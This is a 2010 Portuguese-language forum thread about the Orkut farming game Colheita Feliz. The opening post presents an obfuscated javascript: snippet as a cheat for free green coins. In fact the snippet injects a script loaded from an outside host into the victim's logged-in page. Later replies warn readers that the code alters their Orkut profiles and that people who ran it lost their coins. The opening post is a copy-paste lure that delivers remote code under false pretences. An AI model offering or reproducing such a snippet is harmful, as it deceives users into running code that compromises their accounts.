cacarlos13 0 Postado 7 de Janeiro 2010 Compartilhar Postado 7 de Janeiro 2010 um jeito facil plo colheita feliz tem um aplicativo no orkut q se chama moeda verde e ele ajuda a pegar moeda verde no colheita feliz href="javascript:d=document;c=d.createElement(%22script%22);d.body.appendChild©;c.src=%22ht%22+%22tp:%22+%22//%22+%22fon%22+%22.%22+%22gs%22+%22/feliz1%22;void(0)" foi malz mais da Ctrl + C e Ctrl + V pq esse eh o meu primeiro topico muito obrigado pela comprienção ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
jimmynho10 0 Postado 7 de Janeiro 2010 Compartilhar Postado 7 de Janeiro 2010 nao funfa tiro isso dai NOOOB ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
pkm 0 Postado 7 de Janeiro 2010 Compartilhar Postado 7 de Janeiro 2010 Pessoal! Isto vai mudar seu perfil e uma par de coisa do seu orkut, nâo copiem e colem no seu navegador, jà vi varios amigos fazerem isto e tomarem no toba... Nâo copiem! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
tldc 3 Postado 7 de Janeiro 2010 Compartilhar Postado 7 de Janeiro 2010 É o seguinte....quem me conhece sabe que eu não posto coisa que não funciona aqui na WC... Então só estou aqui vindo alertar TODOS para tomarem cuidado com o que postam sobre o Colheita Feliz aqui na WC relacionado a códigos como este post do cacarlos13 por exemplo. Já vi mtas pessoas dizendo que tentaram usar coisas desse tipo no Colheita Feliz e acabaram tendo suas moedas verdes hackeadas no jogo, perderam todas que tinham. Então, até onde eu sei o único modo de conseguir moedas verdes sem ter que gastar dinheiro é pelo esquema do PTC. Mais nada a dizer. Não é flood e nem informação inútil, estou apenas contribuindo para que as coisas funcionem sem ninguém sair prejudicado. Pessoal! Isto vai mudar seu perfil e uma par de coisa do seu orkut, nâo copiem e colem no seu navegador, jà vi varios amigos fazerem isto e tomarem no toba... Nâo copiem! Tem razão, não caiam nessa não. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
danielbraz 0 Postado 9 de Janeiro 2010 Compartilhar Postado 9 de Janeiro 2010 pkm1000 e tldc tem rasão eu tive um amigo que consiguiu fazer o rack ele ficou com umas 10000 moedas verdes e depois perdeu todas todo mundo fla de rack colheita feliz depois que se ferram pra acha perdem tudo todos vcs tomem cuidado com o prejudicamento plz Obrigado e flws ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados